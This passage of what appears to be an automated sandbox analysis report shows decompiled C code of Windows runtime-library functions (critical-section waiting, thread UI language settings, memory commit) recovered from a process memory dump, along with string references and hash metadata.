                            					} else {
                            						_v8 = 0;
                            						_t325 = 0xc0000100;
                            						_v52 = 0xc0000100;
                            						_t245 = 4;
                            						while(1) {
                            							_v40 = _t245;
                            							__eflags = _t245;
                            							if(_t245 == 0) {
                            								break;
                            							}
                            							_t293 = _t245 * 0xc;
                            							_v48 = _t293;
                            							__eflags = _t280 -  *((intOrPtr*)(_t293 + 0x12c1664));
                            							if(__eflags <= 0) {
                            								if(__eflags == 0) {
                            									_t260 = E0132E5C0(_a8,  *((intOrPtr*)(_t293 + 0x12c1668)), _t280);
                            									_t331 = _t331 + 0xc;
                            									__eflags = _t260;
                            									if(__eflags == 0) {
                            										_t325 = E013651BE(_t280,  *((intOrPtr*)(_v48 + 0x12c166c)), _a16, _t317, _t325, __eflags, _a20, _a24);
                            										_v52 = _t325;
                            										break;
                            									} else {
                            										_t245 = _v40;
                            										goto L62;
                            									}
                            									goto L70;
                            								} else {
                            									L62:
                            									_t245 = _t245 - 1;
                            									continue;
                            								}
                            							}
                            							break;
                            						}
                            						_v32 = _t325;
                            						__eflags = _t325;
                            						if(_t325 < 0) {
                            							__eflags = _t325 - 0xc0000100;
                            							if(_t325 == 0xc0000100) {
                            								_t289 = _a4;
                            								__eflags = _t289;
                            								if(_t289 != 0) {
                            									_v36 = _t289;
                            									__eflags =  *_t289 - _t317;
                            									if( *_t289 == _t317) {
                            										_t325 = 0xc0000100;
                            										goto L76;
                            									} else {
                            										_t305 =  *((intOrPtr*)(_v44 + 0x30));
                            										_t247 =  *((intOrPtr*)(_t305 + 0x10));
                            										__eflags =  *((intOrPtr*)(_t247 + 0x48)) - _t289;
                            										if( *((intOrPtr*)(_t247 + 0x48)) == _t289) {
                            											__eflags =  *(_t305 + 0x1c);
                            											if( *(_t305 + 0x1c) == 0) {
                            												L106:
                            												_t325 = E01312AE4( &_v36, _a8, _t280, _a16, _a20, _a24);
                            												_v32 = _t325;
                            												__eflags = _t325 - 0xc0000100;
                            												if(_t325 != 0xc0000100) {
                            													goto L69;
                            												} else {
                            													_t317 = 1;
                            													_t289 = _v36;
                            													goto L75;
                            												}
                            											} else {
                            												_t250 = E012F6600( *(_t305 + 0x1c));
                            												__eflags = _t250;
                            												if(_t250 != 0) {
                            													goto L106;
                            												} else {
                            													_t289 = _a4;
                            													goto L75;
                            												}
                            											}
                            										} else {
                            											L75:
                            											_t325 = E01312C50(_t289, _a8, _t280, _a16, _a20, _a24, _t317);
                            											L76:
                            											_v32 = _t325;
                            											goto L69;
                            										}
                            									}
                            									goto L108;
                            								} else {
                            									E012FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                            									_v8 = 1;
                            									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                            									_t325 = _a24;
                            									_t257 = E01312AE4( &_v36, _a8, _t280, _a16, _a20, _t325);
                            									_v32 = _t257;
                            									__eflags = _t257 - 0xc0000100;
                            									if(_t257 == 0xc0000100) {
                            										_v32 = E01312C50(_v36, _a8, _t280, _a16, _a20, _t325, 1);
                            									}
                            									_v8 = _t317;
                            									E01312ACB();
                            								}
                            							}
                            						}
                            						L69:
                            						_v8 = 0xfffffffe;
                            						_t243 = _t325;
                            					}
                            					L70:
                            					return E0133D0D1(_t243);
                            				}
                            				L108:
                            			}


                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: PATH
                            • API String ID: 0-1036084923
                            • Opcode ID: 6d0d5b939af5945567802f8b6c9686655b2b4ea656b99b5240ee45c562643d78
                            • Instruction ID: f1cac74310744c23635540087dff669f37985a01aa2a92594e1caf80704759d3
                            • Opcode Fuzzy Hash: 6d0d5b939af5945567802f8b6c9686655b2b4ea656b99b5240ee45c562643d78
                            • Instruction Fuzzy Hash: 6BC19071D00219DFDB29DF9DD880AAEBBB5FF48718F144429E901BB294D774A941CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 80%
                            			E0131FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                            				char _v5;
                            				signed int _v8;
                            				signed int _v12;
                            				char _v16;
                            				char _v17;
                            				char _v20;
                            				signed int _v24;
                            				char _v28;
                            				char _v32;
                            				signed int _v40;
                            				void* __ecx;
                            				void* __edi;
                            				void* __ebp;
                            				signed int _t73;
                            				intOrPtr* _t75;
                            				signed int _t77;
                            				signed int _t79;
                            				signed int _t81;
                            				intOrPtr _t83;
                            				intOrPtr _t85;
                            				intOrPtr _t86;
                            				signed int _t91;
                            				signed int _t94;
                            				signed int _t95;
                            				signed int _t96;
                            				signed int _t106;
                            				signed int _t108;
                            				signed int _t114;
                            				signed int _t116;
                            				signed int _t118;
                            				signed int _t122;
                            				signed int _t123;
                            				void* _t129;
                            				signed int _t130;
                            				void* _t132;
                            				intOrPtr* _t134;
                            				signed int _t138;
                            				signed int _t141;
                            				signed int _t147;
                            				intOrPtr _t153;
                            				signed int _t154;
                            				signed int _t155;
                            				signed int _t170;
                            				void* _t174;
                            				signed int _t176;
                            				signed int _t177;
                            
                            				_t129 = __ebx;
                            				_push(_t132);
                            				_push(__esi);
                            				_t174 = _t132;
                            				_t73 =  !( *( *(_t174 + 0x18)));
                            				if(_t73 >= 0) {
                            					L5:
                            					return _t73;
                            				} else {
                            					E012FEEF0(0x13d7b60);
                            					_t134 =  *0x13d7b84; // 0x77ad7b80
                            					_t2 = _t174 + 0x24; // 0x24
                            					_t75 = _t2;
                            					if( *_t134 != 0x13d7b80) {
                            						_push(3);
                            						asm("int 0x29");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						_push(0x13d7b60);
                            						_t170 = _v8;
                            						_v28 = 0;
                            						_v40 = 0;
                            						_v24 = 0;
                            						_v17 = 0;
                            						_v32 = 0;
                            						__eflags = _t170 & 0xffff7cf2;
                            						if((_t170 & 0xffff7cf2) != 0) {
                            							L43:
                            							_t77 = 0xc000000d;
                            						} else {
                            							_t79 = _t170 & 0x0000000c;
                            							__eflags = _t79;
                            							if(_t79 != 0) {
                            								__eflags = _t79 - 0xc;
                            								if(_t79 == 0xc) {
                            									goto L43;
                            								} else {
                            									goto L9;
                            								}
                            							} else {
                            								_t170 = _t170 | 0x00000008;
                            								__eflags = _t170;
                            								L9:
                            								_t81 = _t170 & 0x00000300;
                            								__eflags = _t81 - 0x300;
                            								if(_t81 == 0x300) {
                            									goto L43;
                            								} else {
                            									_t138 = _t170 & 0x00000001;
                            									__eflags = _t138;
                            									_v24 = _t138;
                            									if(_t138 != 0) {
                            										__eflags = _t81;
                            										if(_t81 != 0) {
                            											goto L43;
                            										} else {
                            											goto L11;
                            										}
                            									} else {
                            										L11:
                            										_push(_t129);
                            										_t77 = E012F6D90( &_v20);
                            										_t130 = _t77;
                            										__eflags = _t130;
                            										if(_t130 >= 0) {
                            											_push(_t174);
                            											__eflags = _t170 & 0x00000301;
                            											if((_t170 & 0x00000301) == 0) {
                            												_t176 = _a8;
                            												__eflags = _t176;
                            												if(__eflags == 0) {
                            													L64:
                            													_t83 =  *[fs:0x18];
                            													_t177 = 0;
                            													__eflags =  *(_t83 + 0xfb8);
                            													if( *(_t83 + 0xfb8) != 0) {
                            														E012F76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                            														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                            													}
                            													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                            													goto L15;
                            												} else {
                            													asm("sbb edx, edx");
                            													_t114 = E01388938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                            													__eflags = _t114;
                            													if(_t114 < 0) {
                            														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                            														E012EB150();
                            													}
                            													_t116 = E01386D81(_t176,  &_v16);
                            													__eflags = _t116;
                            													if(_t116 >= 0) {
                            														__eflags = _v16 - 2;
                            														if(_v16 < 2) {
                            															L56:
                            															_t118 = E012F75CE(_v20, 5, 0);
                            															__eflags = _t118;
                            															if(_t118 < 0) {
                            																L67:
                            																_t130 = 0xc0000017;
                            																goto L32;
                            															} else {
                            																__eflags = _v12;
                            																if(_v12 == 0) {
                            																	goto L67;
                            																} else {
                            																	_t153 =  *0x13d8638; // 0x0
                            																	_t122 = L012F38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                            																	_t154 = _v12;
                            																	_t130 = _t122;
                            																	__eflags = _t130;
                            																	if(_t130 >= 0) {
                            																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                            																		__eflags = _t123;
                            																		if(_t123 != 0) {
                            																			_t155 = _a12;
                            																			__eflags = _t155;
                            																			if(_t155 != 0) {
                            																				 *_t155 = _t123;
                            																			}
                            																			goto L64;
                            																		} else {
                            																			E012F76E2(_t154);
                            																			goto L41;
                            																		}
                            																	} else {
                            																		E012F76E2(_t154);
                            																		_t177 = 0;
                            																		goto L18;
                            																	}
                            																}
                            															}
                            														} else {
                            															__eflags =  *_t176;
                            															if( *_t176 != 0) {
                            																goto L56;
                            															} else {
                            																__eflags =  *(_t176 + 2);
                            																if( *(_t176 + 2) == 0) {
                            																	goto L64;
                            																} else {
                            																	goto L56;
                            																}
                            															}
                            														}
                            													} else {
                            														_t130 = 0xc000000d;
                            														goto L32;
                            													}
                            												}
                            												goto L35;
                            											} else {
                            												__eflags = _a8;
                            												if(_a8 != 0) {
                            													_t77 = 0xc000000d;
                            												} else {
                            													_v5 = 1;
                            													L0131FCE3(_v20, _t170);
                            													_t177 = 0;
                            													__eflags = 0;
                            													L15:
                            													_t85 =  *[fs:0x18];
                            													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                            													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                            														L18:
                            														__eflags = _t130;
                            														if(_t130 != 0) {
                            															goto L32;
                            														} else {
                            															__eflags = _v5 - _t130;
                            															if(_v5 == _t130) {
                            																goto L32;
                            															} else {
                            																_t86 =  *[fs:0x18];
                            																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                            																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                            																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                            																}
                            																__eflags = _t177;
                            																if(_t177 == 0) {
                            																	L31:
                            																	__eflags = 0;
                            																	L012F70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                            																	goto L32;
                            																} else {
                            																	__eflags = _v24;
                            																	_t91 =  *(_t177 + 0x20);
                            																	if(_v24 != 0) {
                            																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                            																		goto L31;
                            																	} else {
                            																		_t141 = _t91 & 0x00000040;
                            																		__eflags = _t170 & 0x00000100;
                            																		if((_t170 & 0x00000100) == 0) {
                            																			__eflags = _t141;
                            																			if(_t141 == 0) {
                            																				L74:
                            																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                            																				goto L27;
                            																			} else {
                            																				_t177 = E0131FD22(_t177);
                            																				__eflags = _t177;
                            																				if(_t177 == 0) {
                            																					goto L42;
                            																				} else {
                            																					_t130 = E0131FD9B(_t177, 0, 4);
                            																					__eflags = _t130;
                            																					if(_t130 != 0) {
                            																						goto L42;
                            																					} else {
                            																						_t68 = _t177 + 0x20;
                            																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                            																						__eflags =  *_t68;
                            																						_t91 =  *(_t177 + 0x20);
                            																						goto L74;
                            																					}
                            																				}
                            																			}
                            																			goto L35;
                            																		} else {
                            																			__eflags = _t141;
                            																			if(_t141 != 0) {
                            																				_t177 = E0131FD22(_t177);
                            																				__eflags = _t177;
                            																				if(_t177 == 0) {
                            																					L42:
                            																					_t77 = 0xc0000001;
                            																					goto L33;
                            																				} else {
                            																					_t130 = E0131FD9B(_t177, 0, 4);
                            																					__eflags = _t130;
                            																					if(_t130 != 0) {
                            																						goto L42;
                            																					} else {
                            																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                            																						_t91 =  *(_t177 + 0x20);
                            																						goto L26;
                            																					}
                            																				}
                            																				goto L35;
                            																			} else {
                            																				L26:
                            																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                            																				__eflags = _t94;
                            																				L27:
                            																				 *(_t177 + 0x20) = _t94;
                            																				__eflags = _t170 & 0x00008000;
                            																				if((_t170 & 0x00008000) != 0) {
                            																					_t95 = _a12;
                            																					__eflags = _t95;
                            																					if(_t95 != 0) {
                            																						_t96 =  *_t95;
                            																						__eflags = _t96;
                            																						if(_t96 != 0) {
                            																							 *((short*)(_t177 + 0x22)) = 0;
                            																							_t40 = _t177 + 0x20;
                            																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                            																							__eflags =  *_t40;
                            																						}
                            																					}
                            																				}
                            																				goto L31;
                            																			}
                            																		}
                            																	}
                            																}
                            															}
                            														}
                            													} else {
                            														_t147 =  *( *[fs:0x18] + 0xfc0);
                            														_t106 =  *(_t147 + 0x20);
                            														__eflags = _t106 & 0x00000040;
                            														if((_t106 & 0x00000040) != 0) {
                            															_t147 = E0131FD22(_t147);
                            															__eflags = _t147;
                            															if(_t147 == 0) {
                            																L41:
                            																_t130 = 0xc0000001;
                            																L32:
                            																_t77 = _t130;
                            																goto L33;
                            															} else {
                            																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                            																_t106 =  *(_t147 + 0x20);
                            																goto L17;
                            															}
                            															goto L35;
                            														} else {
                            															L17:
                            															_t108 = _t106 | 0x00000080;
                            															__eflags = _t108;
                            															 *(_t147 + 0x20) = _t108;
                            															 *( *[fs:0x18] + 0xfc0) = _t147;
                            															goto L18;
                            														}
                            													}
                            												}
                            											}
                            											L33:
                            										}
                            									}
                            								}
                            							}
                            						}
                            						L35:
                            						return _t77;
                            					} else {
                            						 *_t75 = 0x13d7b80;
                            						 *((intOrPtr*)(_t75 + 4)) = _t134;
                            						 *_t134 = _t75;
                            						 *0x13d7b84 = _t75;
                            						_t73 = E012FEB70(_t134, 0x13d7b60);
                            						if( *0x13d7b20 != 0) {
                            							_t73 =  *( *[fs:0x30] + 0xc);
                            							if( *((char*)(_t73 + 0x28)) == 0) {
                            								_t73 = E012FFF60( *0x13d7b20);
                            							}
                            						}
                            						goto L5;
                            					}
                            				}
                            			}

                            Strings
                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0135BE0F
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                            • API String ID: 0-865735534
                            • Opcode ID: 5a03aeb85f764103c1c80c69d0d21feb0d105eff13d2219b99f6d8ab2db2bd86
                            • Instruction ID: fc4594c74b8099c6836db59a521081e4577b9ab27387948352fd3cbb35d16532
                            • Opcode Fuzzy Hash: 5a03aeb85f764103c1c80c69d0d21feb0d105eff13d2219b99f6d8ab2db2bd86
                            • Instruction Fuzzy Hash: AFA10571B006068BEB29DF6CC450B7AB7A9BF48B18F04457DDE46DB689DB30D849DB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 63%
                            			E012E2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                            				signed char _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				signed int _v52;
                            				void* __esi;
                            				void* __ebp;
                            				intOrPtr _t55;
                            				signed int _t57;
                            				signed int _t58;
                            				char* _t62;
                            				signed char* _t63;
                            				signed char* _t64;
                            				signed int _t67;
                            				signed int _t72;
                            				signed int _t77;
                            				signed int _t78;
                            				signed int _t88;
                            				intOrPtr _t89;
                            				signed char _t93;
                            				signed int _t97;
                            				signed int _t98;
                            				signed int _t102;
                            				signed int _t103;
                            				intOrPtr _t104;
                            				signed int _t105;
                            				signed int _t106;
                            				signed char _t109;
                            				signed int _t111;
                            				void* _t116;
                            
                            				_t102 = __edi;
                            				_t97 = __edx;
                            				_v12 = _v12 & 0x00000000;
                            				_t55 =  *[fs:0x18];
                            				_t109 = __ecx;
                            				_v8 = __edx;
                            				_t86 = 0;
                            				_v32 = _t55;
                            				_v24 = 0;
                            				_push(__edi);
                            				if(__ecx == 0x13d5350) {
                            					_t86 = 1;
                            					_v24 = 1;
                            					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                            				}
                            				_t103 = _t102 | 0xffffffff;
                            				if( *0x13d7bc8 != 0) {
                            					_push(0xc000004b);
                            					_push(_t103);
                            					E013297C0();
                            				}
                            				if( *0x13d79c4 != 0) {
                            					_t57 = 0;
                            				} else {
                            					_t57 = 0x13d79c8;
                            				}
                            				_v16 = _t57;
                            				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                            					_t93 = _t109;
                            					L23();
                            				}
                            				_t58 =  *_t109;
                            				if(_t58 == _t103) {
                            					__eflags =  *(_t109 + 0x14) & 0x01000000;
                            					_t58 = _t103;
                            					if(__eflags == 0) {
                            						_t93 = _t109;
                            						E01311624(_t86, __eflags);
                            						_t58 =  *_t109;
                            					}
                            				}
                            				_v20 = _v20 & 0x00000000;
                            				if(_t58 != _t103) {
                            					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                            				}
                            				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                            				_t88 = _v16;
                            				_v28 = _t104;
                            				L9:
                            				while(1) {
                            					if(E01307D50() != 0) {
                            						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                            					} else {
                            						_t62 = 0x7ffe0382;
                            					}
                            					if( *_t62 != 0) {
                            						_t63 =  *[fs:0x30];
                            						__eflags = _t63[0x240] & 0x00000002;
                            						if((_t63[0x240] & 0x00000002) != 0) {
                            							_t93 = _t109;
                            							E0137FE87(_t93);
                            						}
                            					}
                            					if(_t104 != 0xffffffff) {
                            						_push(_t88);
                            						_push(0);
                            						_push(_t104);
                            						_t64 = E01329520();
                            						goto L15;
                            					} else {
                            						while(1) {
                            							_t97 =  &_v8;
                            							_t64 = E0131E18B(_t109 + 4, _t97, 4, _t88, 0);
                            							if(_t64 == 0x102) {
                            								break;
                            							}
                            							_t93 =  *(_t109 + 4);
                            							_v8 = _t93;
                            							if((_t93 & 0x00000002) != 0) {
                            								continue;
                            							}
                            							L15:
                            							if(_t64 == 0x102) {
                            								break;
                            							}
                            							_t89 = _v24;
                            							if(_t64 < 0) {
                            								L0133DF30(_t93, _t97, _t64);
                            								_push(_t93);
                            								_t98 = _t97 | 0xffffffff;
                            								__eflags =  *0x13d6901;
                            								_push(_t109);
                            								_v52 = _t98;
                            								if( *0x13d6901 != 0) {
                            									_push(0);
                            									_push(1);
                            									_push(0);
                            									_push(0x100003);
                            									_push( &_v12);
                            									_t72 = E01329980();
                            									__eflags = _t72;
                            									if(_t72 < 0) {
                            										_v12 = _t98 | 0xffffffff;
                            									}
                            								}
                            								asm("lock cmpxchg [ecx], edx");
                            								_t111 = 0;
                            								__eflags = 0;
                            								if(0 != 0) {
                            									__eflags = _v12 - 0xffffffff;
                            									if(_v12 != 0xffffffff) {
                            										_push(_v12);
                            										E013295D0();
                            									}
                            								} else {
                            									_t111 = _v12;
                            								}
                            								return _t111;
                            							} else {
                            								if(_t89 != 0) {
                            									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                            									_t77 = E01307D50();
                            									__eflags = _t77;
                            									if(_t77 == 0) {
                            										_t64 = 0x7ffe0384;
                            									} else {
                            										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                            									}
                            									__eflags =  *_t64;
                            									if( *_t64 != 0) {
                            										_t64 =  *[fs:0x30];
                            										__eflags = _t64[0x240] & 0x00000004;
                            										if((_t64[0x240] & 0x00000004) != 0) {
                            											_t78 = E01307D50();
                            											__eflags = _t78;
                            											if(_t78 == 0) {
                            												_t64 = 0x7ffe0385;
                            											} else {
                            												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                            											}
                            											__eflags =  *_t64 & 0x00000020;
                            											if(( *_t64 & 0x00000020) != 0) {
                            												_t64 = E01367016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                            											}
                            										}
                            									}
                            								}
                            								return _t64;
                            							}
                            						}
                            						_t97 = _t88;
                            						_t93 = _t109;
                            						E0137FDDA(_t97, _v12);
                            						_t105 =  *_t109;
                            						_t67 = _v12 + 1;
                            						_v12 = _t67;
                            						__eflags = _t105 - 0xffffffff;
                            						if(_t105 == 0xffffffff) {
                            							_t106 = 0;
                            							__eflags = 0;
                            						} else {
                            							_t106 =  *(_t105 + 0x14);
                            						}
                            						__eflags = _t67 - 2;
                            						if(_t67 > 2) {
                            							__eflags = _t109 - 0x13d5350;
                            							if(_t109 != 0x13d5350) {
                            								__eflags = _t106 - _v20;
                            								if(__eflags == 0) {
                            									_t93 = _t109;
                            									E0137FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                            								}
                            							}
                            						}
                            						_push("RTL: Re-Waiting\n");
                            						_push(0);
                            						_push(0x65);
                            						_v20 = _t106;
                            						E01375720();
                            						_t104 = _v28;
                            						_t116 = _t116 + 0xc;
                            						continue;
                            					}
                            				}
                            			}


                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: RTL: Re-Waiting
                            • API String ID: 0-316354757
                            • Opcode ID: 56931849cdb62767dd992a88e6ab9d225f1866a774d517f99b8c486d716d23f7
                            • Instruction ID: af44a32e347f640424244b70e7caf81914025c9679fb1c07946c5e54e0f35627
                            • Opcode Fuzzy Hash: 56931849cdb62767dd992a88e6ab9d225f1866a774d517f99b8c486d716d23f7
                            • Instruction Fuzzy Hash: 45615A31E10615DFEB32DF6CC844B7E7BECEB84318F580265D612972C1C774A9018B82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 80%
                            			E013B0EA5(void* __ecx, void* __edx) {
                            				signed int _v20;
                            				char _v24;
                            				intOrPtr _v28;
                            				unsigned int _v32;
                            				signed int _v36;
                            				intOrPtr _v40;
                            				char _v44;
                            				intOrPtr _v64;
                            				void* __ebx;
                            				void* __edi;
                            				signed int _t58;
                            				unsigned int _t60;
                            				intOrPtr _t62;
                            				char* _t67;
                            				char* _t69;
                            				void* _t80;
                            				void* _t83;
                            				intOrPtr _t93;
                            				intOrPtr _t115;
                            				char _t117;
                            				void* _t120;
                            
                            				_t83 = __edx;
                            				_t117 = 0;
                            				_t120 = __ecx;
                            				_v44 = 0;
                            				if(E013AFF69(__ecx,  &_v44,  &_v32) < 0) {
                            					L24:
                            					_t109 = _v44;
                            					if(_v44 != 0) {
                            						E013B1074(_t83, _t120, _t109, _t117, _t117);
                            					}
                            					L26:
                            					return _t117;
                            				}
                            				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                            				_t5 = _t83 + 1; // 0x1
                            				_v36 = _t5 << 0xc;
                            				_v40 = _t93;
                            				_t58 =  *(_t93 + 0xc) & 0x40000000;
                            				asm("sbb ebx, ebx");
                            				_t83 = ( ~_t58 & 0x0000003c) + 4;
                            				if(_t58 != 0) {
                            					_push(0);
                            					_push(0x14);
                            					_push( &_v24);
                            					_push(3);
                            					_push(_t93);
                            					_push(0xffffffff);
                            					_t80 = E01329730();
                            					_t115 = _v64;
                            					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                            						_push(_t93);
                            						E013AA80D(_t115, 1, _v20, _t117);
                            						_t83 = 4;
                            					}
                            				}
                            				if(E013AA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                            					goto L24;
                            				}
                            				_t60 = _v32;
                            				_t97 = (_t60 != 0x100000) + 1;
                            				_t83 = (_v44 -  *0x13d8b04 >> 0x14) + (_v44 -  *0x13d8b04 >> 0x14);
                            				_v28 = (_t60 != 0x100000) + 1;
                            				_t62 = _t83 + (_t60 >> 0x14) * 2;
                            				_v40 = _t62;
                            				if(_t83 >= _t62) {
                            					L10:
                            					asm("lock xadd [eax], ecx");
                            					asm("lock xadd [eax], ecx");
                            					if(E01307D50() == 0) {
                            						_t67 = 0x7ffe0380;
                            					} else {
                            						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                            					}
                            					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                            						E013A138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                            					}
                            					if(E01307D50() == 0) {
                            						_t69 = 0x7ffe0388;
                            					} else {
                            						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                            					}
                            					if( *_t69 != 0) {
                            						E0139FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                            					}
                            					if(( *0x13d8724 & 0x00000008) != 0) {
                            						E013A52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                            					}
                            					_t117 = _v44;
                            					goto L26;
                            				}
                            				while(E013B15B5(0x13d8ae4, _t83, _t97, _t97) >= 0) {
                            					_t97 = _v28;
                            					_t83 = _t83 + 2;
                            					if(_t83 < _v40) {
                            						continue;
                            					}
                            					goto L10;
                            				}
                            				goto L24;
                            			}


                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: `
                            • API String ID: 0-2679148245
                            • Opcode ID: 389c5e856891dda974184c53ff601885cd90c953c5413af9d30917dfe4b6190b
                            • Instruction ID: b278a67f21557bcc2e85200718d10c5c908dac81bb0f5d92319c78a7710583d7
                            • Opcode Fuzzy Hash: 389c5e856891dda974184c53ff601885cd90c953c5413af9d30917dfe4b6190b
                            • Instruction Fuzzy Hash: 4A519F713043429FD325DF28E8D4B5BBBE9EBC4708F04092DF69697A90E670E909C762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E0131F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				char* _v20;
                            				intOrPtr _v24;
                            				char _v28;
                            				intOrPtr _v32;
                            				char _v36;
                            				char _v44;
                            				char _v52;
                            				intOrPtr _v56;
                            				char _v60;
                            				intOrPtr _v72;
                            				void* _t51;
                            				void* _t58;
                            				signed short _t82;
                            				short _t84;
                            				signed int _t91;
                            				signed int _t100;
                            				signed short* _t103;
                            				void* _t108;
                            				intOrPtr* _t109;
                            
                            				_t103 = __ecx;
                            				_t82 = __edx;
                            				_t51 = E01304120(0, __ecx, 0,  &_v52, 0, 0, 0);
                            				if(_t51 >= 0) {
                            					_push(0x21);
                            					_push(3);
                            					_v56 =  *0x7ffe02dc;
                            					_v20 =  &_v52;
                            					_push( &_v44);
                            					_v28 = 0x18;
                            					_push( &_v28);
                            					_push(0x100020);
                            					_v24 = 0;
                            					_push( &_v60);
                            					_v16 = 0x40;
                            					_v12 = 0;
                            					_v8 = 0;
                            					_t58 = E01329830();
                            					_t87 =  *[fs:0x30];
                            					_t108 = _t58;
                            					L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                            					if(_t108 < 0) {
                            						L11:
                            						_t51 = _t108;
                            					} else {
                            						_push(4);
                            						_push(8);
                            						_push( &_v36);
                            						_push( &_v44);
                            						_push(_v60);
                            						_t108 = E01329990();
                            						if(_t108 < 0) {
                            							L10:
                            							_push(_v60);
                            							E013295D0();
                            							goto L11;
                            						} else {
                            							_t109 = L01304620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                            							if(_t109 == 0) {
                            								_t108 = 0xc0000017;
                            								goto L10;
                            							} else {
                            								_t21 = _t109 + 0x18; // 0x18
                            								 *((intOrPtr*)(_t109 + 4)) = _v60;
                            								 *_t109 = 1;
                            								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                            								 *(_t109 + 0xe) = _t82;
                            								 *((intOrPtr*)(_t109 + 8)) = _v56;
                            								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                            								E0132F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                            								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                            								 *((short*)(_t109 + 0xc)) =  *_t103;
                            								_t91 =  *_t103 & 0x0000ffff;
                            								_t100 = _t91 & 0xfffffffe;
                            								_t84 = 0x5c;
                            								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                            									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                            										_push(_v60);
                            										E013295D0();
